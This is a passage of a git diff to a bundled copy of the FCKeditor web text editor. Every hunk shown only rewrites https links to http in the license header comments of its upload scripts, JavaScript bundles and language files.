editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/lasso/upload.lasso b/admin/FCKeditor/editor/filemanager/upload/lasso/upload.lasso index 34bfb44..a52eead 100755 --- a/admin/FCKeditor/editor/filemanager/upload/lasso/upload.lasso +++ b/admin/FCKeditor/editor/filemanager/upload/lasso/upload.lasso @@ -1,6 +1,6 @@ [//lasso /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/php/config.php b/admin/FCKeditor/editor/filemanager/upload/php/config.php index 38f6898..5ee0d6e 100755 --- a/admin/FCKeditor/editor/filemanager/upload/php/config.php +++ b/admin/FCKeditor/editor/filemanager/upload/php/config.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/php/upload.php b/admin/FCKeditor/editor/filemanager/upload/php/upload.php index b695013..9f09156 100755 --- a/admin/FCKeditor/editor/filemanager/upload/php/upload.php +++ b/admin/FCKeditor/editor/filemanager/upload/php/upload.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/php/util.php b/admin/FCKeditor/editor/filemanager/upload/php/util.php index ec74d02..bf89d74 100755 --- a/admin/FCKeditor/editor/filemanager/upload/php/util.php +++ b/admin/FCKeditor/editor/filemanager/upload/php/util.php @@ -1,6 +1,6 @@ <?php /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/filemanager/upload/test.html b/admin/FCKeditor/editor/filemanager/upload/test.html index dc0f569..31da35e 100755 --- a/admin/FCKeditor/editor/filemanager/upload/test.html +++ b/admin/FCKeditor/editor/filemanager/upload/test.html @@ -1,5 +1,5 @@ <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/js/fckeditorcode_gecko.js b/admin/FCKeditor/editor/js/fckeditorcode_gecko.js index d9e2262..a40b1dc 100755 --- a/admin/FCKeditor/editor/js/fckeditorcode_gecko.js +++ b/admin/FCKeditor/editor/js/fckeditorcode_gecko.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/js/fckeditorcode_ie.js b/admin/FCKeditor/editor/js/fckeditorcode_ie.js index c52d02d..644afdc 100755 --- a/admin/FCKeditor/editor/js/fckeditorcode_ie.js +++ b/admin/FCKeditor/editor/js/fckeditorcode_ie.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/_getfontformat.html b/admin/FCKeditor/editor/lang/_getfontformat.html index bc4c724..ad9e2a4 100755 --- a/admin/FCKeditor/editor/lang/_getfontformat.html +++ b/admin/FCKeditor/editor/lang/_getfontformat.html @@ -1,6 +1,6 @@ <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -9,13 +9,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == --> diff --git a/admin/FCKeditor/editor/lang/_translationstatus.txt b/admin/FCKeditor/editor/lang/_translationstatus.txt index 44bf8b5..34b9572 100755 --- a/admin/FCKeditor/editor/lang/_translationstatus.txt +++ b/admin/FCKeditor/editor/lang/_translationstatus.txt @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/af.js b/admin/FCKeditor/editor/lang/af.js index d42efb2..139c63b 100755 --- a/admin/FCKeditor/editor/lang/af.js +++ b/admin/FCKeditor/editor/lang/af.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ar.js b/admin/FCKeditor/editor/lang/ar.js index b86ed87..b688cb6 100755 --- a/admin/FCKeditor/editor/lang/ar.js +++ b/admin/FCKeditor/editor/lang/ar.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/bg.js b/admin/FCKeditor/editor/lang/bg.js index 31a3bda..c2796c9 100755 --- a/admin/FCKeditor/editor/lang/bg.js +++ b/admin/FCKeditor/editor/lang/bg.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/bn.js b/admin/FCKeditor/editor/lang/bn.js index 41bc15b..aed9f55 100755 --- a/admin/FCKeditor/editor/lang/bn.js +++ b/admin/FCKeditor/editor/lang/bn.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/bs.js b/admin/FCKeditor/editor/lang/bs.js index 3fa525a..1e31759 100755 --- a/admin/FCKeditor/editor/lang/bs.js +++ b/admin/FCKeditor/editor/lang/bs.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/ca.js b/admin/FCKeditor/editor/lang/ca.js index e0354a4..643518c 100755 --- a/admin/FCKeditor/editor/lang/ca.js +++ b/admin/FCKeditor/editor/lang/ca.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/cs.js b/admin/FCKeditor/editor/lang/cs.js index 721b6e1..7637efc 100755 --- a/admin/FCKeditor/editor/lang/cs.js +++ b/admin/FCKeditor/editor/lang/cs.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/da.js b/admin/FCKeditor/editor/lang/da.js index be40512..2a0f2ab 100755 --- a/admin/FCKeditor/editor/lang/da.js +++ b/admin/FCKeditor/editor/lang/da.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/de.js b/admin/FCKeditor/editor/lang/de.js index 77c32de..7a2a950 100755 --- a/admin/FCKeditor/editor/lang/de.js +++ b/admin/FCKeditor/editor/lang/de.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/el.js b/admin/FCKeditor/editor/lang/el.js index 3bab0b5..51b9d64 100755 --- a/admin/FCKeditor/editor/lang/el.js +++ b/admin/FCKeditor/editor/lang/el.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/en-au.js b/admin/FCKeditor/editor/lang/en-au.js index 7a6a0e8..fddbddd 100755 --- a/admin/FCKeditor/editor/lang/en-au.js +++ b/admin/FCKeditor/editor/lang/en-au.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/en-ca.js b/admin/FCKeditor/editor/lang/en-ca.js index 836f41b..f11e533 100755 --- a/admin/FCKeditor/editor/lang/en-ca.js +++ b/admin/FCKeditor/editor/lang/en-ca.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/en-uk.js b/admin/FCKeditor/editor/lang/en-uk.js index f4a81b1..ae39c91 100755 --- a/admin/FCKeditor/editor/lang/en-uk.js +++ b/admin/FCKeditor/editor/lang/en-uk.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/en.js b/admin/FCKeditor/editor/lang/en.js index 05a0ef9..313a7d9 100755 --- a/admin/FCKeditor/editor/lang/en.js +++ b/admin/FCKeditor/editor/lang/en.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/eo.js b/admin/FCKeditor/editor/lang/eo.js index e54d2b3..ebc4b33 100755 --- a/admin/FCKeditor/editor/lang/eo.js +++ b/admin/FCKeditor/editor/lang/eo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/es.js b/admin/FCKeditor/editor/lang/es.js index ade12d9..cbac866 100755 --- a/admin/FCKeditor/editor/lang/es.js +++ b/admin/FCKeditor/editor/lang/es.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/et.js b/admin/FCKeditor/editor/lang/et.js index edb868b..8eeb36c 100755 --- a/admin/FCKeditor/editor/lang/et.js +++ b/admin/FCKeditor/editor/lang/et.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/eu.js b/admin/FCKeditor/editor/lang/eu.js index 496f723..eb45316 100755 --- a/admin/FCKeditor/editor/lang/eu.js +++ b/admin/FCKeditor/editor/lang/eu.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/fa.js b/admin/FCKeditor/editor/lang/fa.js index 272240c..9d97ee3 100755 --- a/admin/FCKeditor/editor/lang/fa.js +++ b/admin/FCKeditor/editor/lang/fa.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/fi.js b/admin/FCKeditor/editor/lang/fi.js index d4af746..481887a 100755 --- a/admin/FCKeditor/editor/lang/fi.js +++ b/admin/FCKeditor/editor/lang/fi.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") - * https://www.mozilla.org/MPL/MPL-1.1.html + * http://www.mozilla.org/MPL/MPL-1.1.html * * == END LICENSE == * diff --git a/admin/FCKeditor/editor/lang/fo.js b/admin/FCKeditor/editor/lang/fo.js index ea029fe..e0183f2 100755 --- a/admin/FCKeditor/editor/lang/fo.js +++ b/admin/FCKeditor/editor/lang/fo.js @@ -1,5 +1,5 @@ /* - * FCKeditor - The text editor for Internet - https://www.fckeditor.net + * FCKeditor - The text editor for Internet - http://www.fckeditor.net * Copyright (C) 2003-2007 Frederico Caldeira Knabben * * == BEGIN LICENSE == @@ -8,13 +8,13 @@ * choice: * * - GNU General Public License Version 2 or later (the "GPL") - * https://www.gnu.org/licenses/gpl.html + * http://www.gnu.org/licenses/gpl.html * * - GNU Lesser General Public License Version 2.1 or later (the "LGPL") - * https://www.gnu.org/licenses/lgpl.html + * http://www.gnu.org/licenses/lgpl.html * * - Mozilla Public License Version 1.1 or later (the "MPL") 